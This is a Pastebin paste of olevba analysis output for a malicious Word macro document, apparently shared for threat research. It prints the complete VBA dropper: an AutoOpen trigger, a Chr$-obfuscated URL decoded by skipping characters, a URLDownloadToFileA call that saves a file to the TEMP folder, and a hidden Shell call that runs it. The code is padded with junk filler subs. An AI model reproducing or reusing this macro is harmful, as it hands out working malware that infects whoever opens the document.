dynamoo

Malicious Word macro

Mar 13th, 2015
394
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. olevba 0.25 - http://decalage.info/python/oletools
 2. Flags       Filename                                                        
 3. ----------- -----------------------------------------------------------------
 4. XML:MAS---- 2773kxh.doc
 5.  
 6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
 7.  
 8. ===============================================================================
 9. FILE: 2773kxh.doc
 10. Type: Word2003_XML
 11. -------------------------------------------------------------------------------
 12. VBA MACRO ThisDocument.cls
 13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
 14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 15. Sub autoopen()
 16. z4vF73d
 17. End Sub
 18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 19. ANALYSIS:
 20. +----------+----------+---------------------------------------+
 21. | Type     | Keyword  | Description                           |
 22. +----------+----------+---------------------------------------+
 23. | AutoExec | AutoOpen | Runs when the Word document is opened |
 24. +----------+----------+---------------------------------------+
 25. -------------------------------------------------------------------------------
 26. VBA MACRO ÀâïàâÀ.bas
 27. in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
 28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 29.  
 30. Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
 31. For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
 32. IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
 33. Next
 34. End Function
 35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 36. ANALYSIS:
 37. No suspicious keyword or IOC found.
 38. -------------------------------------------------------------------------------
 39. VBA MACRO ÀÏÀÂÏàâïâ.bas
 40. in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
 41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 42. #If VBA7 Then
 43.     Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
 44.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
 45.     ByVal ÏÀÌÎÐâûà As String, _
 46.     ByVal ÏÀÌÎÐâûàf As String, _
 47.     ByVal ÏÀÌÎÐâûàfd As Long, _
 48.     ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
 49. #Else
 50.     Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
 51.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
 52.     ByVal ÏÀÌÎÐâûà As String, _
 53.     ByVal ÏÀÌÎÐâûàf As String, _
 54.     ByVal ÏÀÌÎÐâûàfd As Long, _
 55.     ByVal ÏÀÌÎÐâûàfds As Long) As Long
 56. #End If
 57. Sub z4vF73d()
 58. ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
 59. , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
 60. End Sub
 61. Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
 62. âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
 63. ïðïàÀàï = Shell(Dm4y, 0)
 64. End Function
 65.  
 66.  
 67.  
 68.  
 69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 70. ANALYSIS:
 71. +------------+--------------------+-----------------------------------------+
 72. | Type       | Keyword            | Description                             |
 73. +------------+--------------------+-----------------------------------------+
 74. | Suspicious | Lib                | May run code from a DLL                 |
 75. | Suspicious | Shell              | May run an executable file or a system  |
 76. |            |                    | command                                 |
 77. | Suspicious | Environ            | May read system environment variables   |
 78. | Suspicious | Chr                | May attempt to obfuscate specific       |
 79. |            |                    | strings                                 |
 80. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
 81. +------------+--------------------+-----------------------------------------+
 82. -------------------------------------------------------------------------------
 83. VBA MACRO Class1.cls
 84. in file: editdata.mso - OLE stream: u'VBA/Class1'
 85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 86. Public Sub VJfmjcZhYHWzt89()
 87. Dim caEhbvHeVNIEE28 As Integer
 88. For caEhbvHeVNIEE28 = 8 To wn
 89. DoEvents
 90. Next caEhbvHeVNIEE28
 91. Dim DcsgpIlJKVLll87 As String
 92. DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
 93. End Sub
 94.  
 95. Public Sub rEFykkBadCmlT28()
 96. Dim PxdhIsVstODSN96 As Integer
 97. For PxdhIsVstODSN96 = 6 To zo
 98. DoEvents
 99. Next PxdhIsVstODSN96
 100. Dim lyRYKztwOtcCv68 As String
 101. lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
 102. End Sub
 103.  
 104. Public Sub xHCiwNdMbiMXH41()
 105. Dim DMjDUoNwJkvod99 As Integer
 106. For DMjDUoNwJkvod99 = 6 To AZ
 107. DoEvents
 108. Next DMjDUoNwJkvod99
 109. Dim MbOCKZMnWgyDP71 As String
 110. MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
 111. End Sub
 112.  
 113. Public Sub pRsFNsbPhfYFW88()
 114. Dim hZLjOUpaCBMMS47 As Integer
 115. For hZLjOUpaCBMMS47 = 7 To Hd
 116. DoEvents
 117. Next hZLjOUpaCBMMS47
 118. Dim iqHqrfwpCwVKm36 As String
 119. iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
 120. End Sub
 121.  
 122. Public Sub qWpQUsRUDvlHS43()
 123. Dim IdGlnffOOYXKa12 As Integer
 124. For IdGlnffOOYXKa12 = 4 To BO
 125. DoEvents
 126. Next IdGlnffOOYXKa12
 127. Dim jYPxUyallTLis72 As String
 128. jYPxUyallTLis72 = "WIblPzwJHhazc55"
 129. End Sub
 130.  
 131. Public Sub ljeCsroJoUhyE78()
 132. Dim VlLLfBEgYlxNH62 As Integer
 133. For VlLLfBEgYlxNH62 = 3 To Uz
 134. DoEvents
 135. Next VlLLfBEgYlxNH62
 136. Dim BBwgLcWwNGMPI35 As String
 137. BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
 138. End Sub
 139.  
 140. Public Sub htVyaunRmFwQL32()
 141. Dim TjUvVjOmkCGbi21 As Integer
 142. For TjUvVjOmkCGbi21 = 8 To QX
 143. DoEvents
 144. Next TjUvVjOmkCGbi21
 145. Dim rLdSRlDmsMiEB93 As String
 146. rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
 147. End Sub
 148.  
 149. Public Sub yETfojXKzCRAj76()
 150. Dim pOEEEDavfUYoV65 As Integer
 151. For pOEEEDavfUYoV65 = 1 To ej
 152. DoEvents
 153. Next pOEEEDavfUYoV65
 154. Dim mgSnlzcAerxTa65 As String
 155. mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
 156. End Sub
 157.  
 158. Public Sub pEXQlfifgpFAb63()
 159. Dim kIPGmTHKqlBzS46 As Integer
 160. For kIPGmTHKqlBzS46 = 1 To fc
 161. DoEvents
 162. Next kIPGmTHKqlBzS46
 163. Dim TmBfAKqohhFMq17 As String
 164. TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
 165. End Sub
 166.  
 167.  
 168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 169. ANALYSIS:
 170. No suspicious keyword or IOC found.
RAW Paste Data